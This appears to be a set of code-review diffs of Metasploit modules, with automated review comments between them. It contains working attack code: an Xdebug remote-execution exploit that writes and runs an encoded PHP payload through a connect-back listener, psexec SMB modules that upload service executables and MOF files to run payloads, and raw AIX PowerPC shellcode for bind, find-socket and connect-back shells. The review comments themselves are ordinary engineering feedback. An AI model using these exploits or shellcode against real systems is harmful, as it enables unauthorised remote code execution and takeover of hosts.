OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
])
end
def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res.headers}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})
client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end
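Review bot: `check` dereferences `res` before testing it: `vprint_status "Request sent\n#{res.headers}"` runs before `if res && res.headers.to_s =~ /XDEBUG/i`, so a nil response raises `NoMethodError` rather than falling through to a CheckCode (the `rescue` only catches `Rex::ConnectionError`); move the `vprint_status` inside the `if res` branch. In `exploit`, the listener runs on a thread that is never joined, and the triggering `send_request_cgi` is sent straight after `Thread.new`, so the request can reach the target before `Rex::Socket::TcpServer.create` has bound the port; create the server before starting the thread (or wait for it) and join or report the thread so a failed `accept` is not swallowed silently. The `ensure` branch calls `webserver.exit` on a variable that can still be nil if the block raises before `Thread.new` has returned, and the normal path already calls it once. Smaller points: `include Rex::Proto::Http` and `include Msf::Exploit::Remote::Tcp` look unused next to `HttpClient`; `X-Forwarded-For` is set to `lhost` while the listener binds `SRVHOST`, so the two must point at the same host for the connect-back to reach this module; and the name says "OS Command Execution" while the description and platform are PHP.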

View File

@ -17,6 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
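Review bot: same include-order question as in the auxiliary module: `Msf::Exploit::Remote::SMB::Client::Psexec` is included after `Psexec_MS17_010`, so its methods win any name clash between the two mixins. If `Psexec_MS17_010` overrides `psexec` or the connection helpers, this include has to come first; otherwise a short comment noting that the two do not overlap would settle it.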
@ -119,221 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
def smb_pwn()
case target.name
when 'Automatic'
if powershell_installed?
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
print_status('Selecting PowerShell target')
powershell
execute_powershell_payload
else
print_status('Selecting native target')
native_upload
native_upload(datastore['SHARE'])
end
when 'PowerShell'
powershell
execute_powershell_payload
when 'Native upload'
native_upload
when 'MOF upload'
mof_upload
mof_upload(datastore['SHARE'])
end
handler
end
# TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to
# be moved into a mixin
def powershell_installed?
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
case datastore['SHARE'].upcase
when 'ADMIN$'
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
path = datastore['PSH_PATH']
end
simple.connect(share)
vprint_status("Checking for #{path}")
if smb_file_exist?(path)
vprint_status('PowerShell found')
psh = true
else
vprint_status('PowerShell not found')
psh = false
end
simple.disconnect(share)
psh
end
def powershell
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
def native_upload
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
# Upload the shellcode to a file
print_status("Uploading payload...")
smbshare = datastore['SHARE']
fileprefix = ""
# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
subfolder = true
smbshare = datastore['SHARE'].dup
smbshare = smbshare.gsub(/^[\\\/]/,"")
folder_list = smbshare.split(/[\\\/]/)
smbshare = folder_list[0]
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct')
else
subfolder = false
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#(unknown)", 'rwct')
end
exe = ''
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
begin
exe = generate_payload_exe_service(opts)
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#(unknown)...")
else
print_status("Created \\#(unknown)...")
end
# Disconnect from the share
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
# define the file location
if datastore['SHARE'] == 'ADMIN$'
file_location = "%SYSTEMROOT%\\#(unknown)"
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
file_location = datastore['SHARE'].slice(0,1) + ":\\#(unknown)"
else
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)"
end
psexec(file_location, false)
unless datastore['SERVICE_PERSIST']
print_status("Deleting \\#(unknown)...")
#This is not really useful but will prevent double \\ on the wire :)
if datastore['SHARE'] =~ /.[\\\/]/
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{fileprefix}\\#(unknown)")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}")
end
else
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#(unknown)")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#(unknown) failed: #{e.message}")
end
end
end
end
def mof_upload
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if datastore['SHARE'] != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#(unknown)", 'rwct')
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#(unknown)")
# mof to cause execution of above
mofname = rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
port: datastore['RPORT'],
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['SMBPass'],
username: datastore['SMBUser'].downcase
}
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: datastore['SMBDomain']
})
end
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
credential_data.merge!({:private_type => :ntlm_hash})
else
credential_data.merge!({:private_type => :password})
end
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
access_level: 'Admin',
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
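Review bot: the `when 'Native upload'` branch is left as the context lines `when 'Native upload'` / `native_upload`, still calling it with no arguments, while the `Automatic` branch now calls `native_upload(datastore['SHARE'])`. With the local `native_upload` removed from this file the call resolves to the mixin method, and if that takes the share as a required parameter, selecting the 'Native upload' target raises `ArgumentError`. The corresponding hunk in the other psexec module updates all three branches; do the same here. Separately, `report_auth` stays duplicated in both modules and is the last piece of the copy-pasted code that could move into the mixin.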

View File

@ -112,177 +112,25 @@ class MetasploitModule < Msf::Exploit::Remote
case target.name
when 'Automatic'
if powershell_installed?
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
print_status('Selecting PowerShell target')
powershell
execute_powershell_payload
else
print_status('Selecting native target')
native_upload
native_upload(datastore['SHARE'])
end
when 'PowerShell'
powershell
execute_powershell_payload
when 'Native upload'
native_upload
native_upload(datastore['SHARE'])
when 'MOF upload'
mof_upload
mof_upload(datastore['SHARE'])
end
handler
disconnect
end
def powershell_installed?
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
case datastore['SHARE'].upcase
when 'ADMIN$'
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
path = datastore['PSH_PATH']
end
simple.connect(share)
vprint_status("Checking for #{path}")
if smb_file_exist?(path)
vprint_status('PowerShell found')
psh = true
else
vprint_status('PowerShell not found')
psh = false
end
simple.disconnect(share)
psh
end
def powershell
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
def native_upload
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
# Upload the shellcode to a file
print_status("Uploading payload...")
smbshare = datastore['SHARE']
fileprefix = ""
# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
subfolder = true
smbshare = datastore['SHARE'].dup
smbshare = smbshare.gsub(/^[\\\/]/,"")
folder_list = smbshare.split(/[\\\/]/)
smbshare = folder_list[0]
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct')
else
subfolder = false
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#(unknown)", 'rwct')
end
exe = ''
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
begin
exe = generate_payload_exe_service(opts)
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#(unknown)...")
else
print_status("Created \\#(unknown)...")
end
# Disconnect from the share
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
# define the file location
if datastore['SHARE'] == 'ADMIN$'
file_location = "%SYSTEMROOT%\\#(unknown)"
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
file_location = datastore['SHARE'].slice(0,1) + ":\\#(unknown)"
else
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)"
end
psexec(file_location, false)
unless datastore['SERVICE_PERSIST']
print_status("Deleting \\#(unknown)...")
#This is not really useful but will prevent double \\ on the wire :)
if datastore['SHARE'] =~ /.[\\\/]/
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{fileprefix}\\#(unknown)")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}")
end
else
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#(unknown)")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#(unknown) failed: #{e.message}")
end
end
end
end
def mof_upload
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if datastore['SHARE'] != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#(unknown)", 'rwct')
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#(unknown)")
# mof to cause execution of above
mofname = rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
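Review bot: all three target branches now pass `datastore['SHARE']`, which is consistent, and the added `disconnect` after `handler` releases the SMB session that the removed helpers used to leave open; this file is the version the ms17_010 psexec hunk should mirror, since that one still calls the zero-argument `native_upload` in its 'Native upload' branch. `report_auth` is untouched in both modules, so it remains a duplicated block that the mixin could absorb.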

View File

@ -40,70 +40,70 @@ module MetasploitModule
super(*args)
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x07\xff" +# lil r29,2047 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
"\x40\x82\xff\xfd" + # bnel <bndsockcode> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x20" + # bctr #
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
"\x44\xff\xff\x02" + # svca 0 #
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
"\x3b\xa0\x07\xff" + # lil r29,2047 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
@cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
"\x3f\x60\xff\x02" +# liu r27,-254 #
"\x63\x7b\x11\x5c" +# oril r27,r27,4444 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
"\x3f\x60\xff\x02" + # liu r27,-254 #
"\x63\x7b\x11\x5c" + # oril r27,r27,4444 #
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_bind +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x83\xe3\x78" + # mr r3,r28 #
@cal_listen +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x83\xe3\x78" + # mr r3,r28 #
@cal_accept +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" + # mr r3,r25 #
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7f\x25\xcb\x78" + # mr r5,r25 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x43\xd3\x78" + # mr r3,r26 #
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
"\x40\x80\xff\xd4" +# bge <bndsockcode+160> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode+208> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
"\x40\x80\xff\xd4" + # bge <bndsockcode+160> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <bndsockcode+208> #
"\x7f\x08\x02\xa6" + # mflr r24 #
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"/bin/csh"
# If the payload is generated and there are offsets to substitute,
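Review bot: this hunk is whitespace only (`+#` becomes `+ #` on every line); the opcode bytes and the assembly comment on each added line match the removed line above it, so the emitted payload is unchanged. A whitespace-only change in shellcode is easier to review with `git diff -w`, and a spec that pins the generated byte string would make future edits of this kind verifiable automatically.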

View File

@ -40,59 +40,59 @@ module MetasploitModule
super(*args)
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x07\xff" +# lil r29,2047 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xf8\x2d" +# cal r27,-2003(r29) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x3b\x0b\x78" +# mr r27,r1 #
"\x3b\xff\x01\xff" +# cal r31,511(r31) #
"\x3b\xff\xfe\x02" +# cal r31,-510(r31) #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7f\x84\xe3\x78" +# mr r4,r28 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
"\x40\x82\xff\xfd" + # bnel <fndsockcode> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x20" + # bctr #
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
"\x44\xff\xff\x02" + # svca 0 #
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
"\x3b\xa0\x07\xff" + # lil r29,2047 #
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
"\x3b\x7d\xf8\x2d" + # cal r27,-2003(r29) #
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
"\x7c\x3b\x0b\x78" + # mr r27,r1 #
"\x3b\xff\x01\xff" + # cal r31,511(r31) #
"\x3b\xff\xfe\x02" + # cal r31,-510(r31) #
"\x7f\x65\xdb\x78" + # mr r5,r27 #
"\x7f\x84\xe3\x78" + # mr r4,r28 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
@cal_getpeername +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x5c\x01\xff" +# cal r26,511(r28) #
"\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) #
"\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 #
"\x40\x82\xff\xd4" +# bne <fndsockcode+64> #
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x3b\x5c\x01\xff" + # cal r26,511(r28) #
"\xa3\x5a\xfe\x03" + # lhz r26,-509(r26) #
"\x28\x1a\x11\x5c" + # cmpli 0,r26,4444 #
"\x40\x82\xff\xd4" + # bne <fndsockcode+64> #
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
"\x7f\x23\xcb\x78" + # mr r3,r25 #
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7f\x25\xcb\x78" + # mr r5,r25 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
"\x40\x80\xff\xd4" +# bge <fndsockcode+116> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode+164> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
"\x40\x80\xff\xd4" + # bge <fndsockcode+116> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <fndsockcode+164> #
"\x7f\x08\x02\xa6" + # mflr r24 #
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"/bin/csh"
# If the payload is generated and there are offsets to substitute,

@ -34,18 +34,18 @@ module MetasploitModule
super(*args)
payload =
"\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" +# /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" +# /* mflr r31 */
"\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" +# /* st r3,-240(r31) */
"\x90\xbf\xff\x14" +# /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" +# /* svca */
"\x7c\xa5\x2a\x79" + # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" + # /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" + # /* mflr r31 */
"\x3b\xff\x01\x20" + # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" + # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" + # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" + # /* st r3,-240(r31) */
"\x90\xbf\xff\x14" + # /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" + # /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" + # /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" + # /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" + # /* svca */
"/bin/sh"+
"\x05"
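Review bot: style: the trailing `"/bin/sh"+` on the line after the rewritten block still has no space before the `+`, so this hunk leaves one inconsistent concatenation in the very payload it is tidying; change it to `"/bin/sh" +` while here.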

@ -41,55 +41,55 @@ module MetasploitModule
super(*args)
payload =
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\xff\x02\x11\x5c" +# .long 0xff02115c #
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x07\xff" +# lil r29,2047 #
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <cntsockcode> #
